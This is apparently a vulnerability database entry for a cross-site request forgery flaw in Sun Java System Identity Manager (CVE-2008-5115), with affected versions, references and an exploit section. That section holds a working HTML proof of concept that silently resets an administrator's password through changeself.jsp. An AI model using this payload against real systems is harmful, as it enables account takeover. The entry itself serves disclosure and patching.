Sun Java System Identity Manager 'changeself.jsp' Cross-Site Request Forgery Vulnerability

Vulnerability ID 1116718 Vulnerability Type Cross-Site Request Forgery
Published 2008-11-11 Updated 2008-11-21
CVE ID CVE-2008-5115 CNNVD ID CNNVD-200811-275
Platform JSP CVSS Score 6.8
|Sources
https://www.exploit-db.com/exploits/32579
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200811-275
|Details
Sun Java System Identity Manager is an end-to-end solution for protecting sensitive data and managing identity profiles and entitlements. A cross-site request forgery vulnerability exists in the administrative self-service page (/idm/admin/changeself.jsp). The update-password request is neither tied to an unpredictable per-session value (an anti-CSRF token) nor does it require the administrative user to enter the current password. An administrator who is tricked into visiting a malicious HTML page while authenticated to Identity Manager can therefore have the administrative password silently changed and the account hijacked.
|Exploit
source: http://www.securityfocus.com/bid/32262/info


Sun Java System Identity Manager is prone to multiple web-interface vulnerabilities, including a cross-site request-forgery issue, multiple cross-site scripting issues, multiple HTML-injection issues, and a directory-traversal vulnerability.

Successful exploits of many of these issues will allow an attacker to completely compromise the affected application.

These issues affect the following versions:

Sun Java System Identity Manager 6.0
Sun Java System Identity Manager 6.0 SP1
Sun Java System Identity Manager 6.0 SP2
Sun Java System Identity Manager 6.0 SP3
Sun Java System Identity Manager 6.0 SP4
Sun Java System Identity Manager 7.0
Sun Java System Identity Manager 7.1 

<html>
<h1>CSRF attack demo - changes administrative password to 'Password19'</h1>
<script>
var img = new Image();
img.src = 'https://target.tld/idm/admin/changeself.jsp?id=&command=Save&activeControl=&resourceAccounts.password=Password19&resourceAccounts.confirmPassword=Password19&resourceAccounts.currentResourceAccounts%5BLighthouse%5D.selected=true';
</script>
</html>
|References

Source: SUNALERT
Name: 243386; Patch Information
Link: http://sunsolve.sun.com/search/document.do?assetkey=1-26-243386-1
Source: XF
Name: sun-jsim-unspecified-csrf(46553)
Link: http://xforce.iss.net/xforce/xfdb/46553
Source: SECTRACK
Name: 1021170
Link: http://www.securitytracker.com/id?1021170
Source: BID
Name: 32262
Link: http://www.securityfocus.com/bid/32262
Source: BUGTRAQ
Name: 20081119 PR07-11: Cross-site Request Forgery (CSRF) on Sun Java System Identity Manager
Link: http://www.securityfocus.com/archive/1/archive/1/498479/100/0/threaded
Source: MISC
Name: http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr07-11
Link: http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr07-11
Source: VUPEN
Name: ADV-2008-3128
Link: http://www.frsirt.com/english/advisories/2008/3128
Source: SECUNIA
Name: 32606
Link: http://secunia.com/advisories/32606
Source: OSVDB
Name: 49766
Link: http://osvdb.org/49766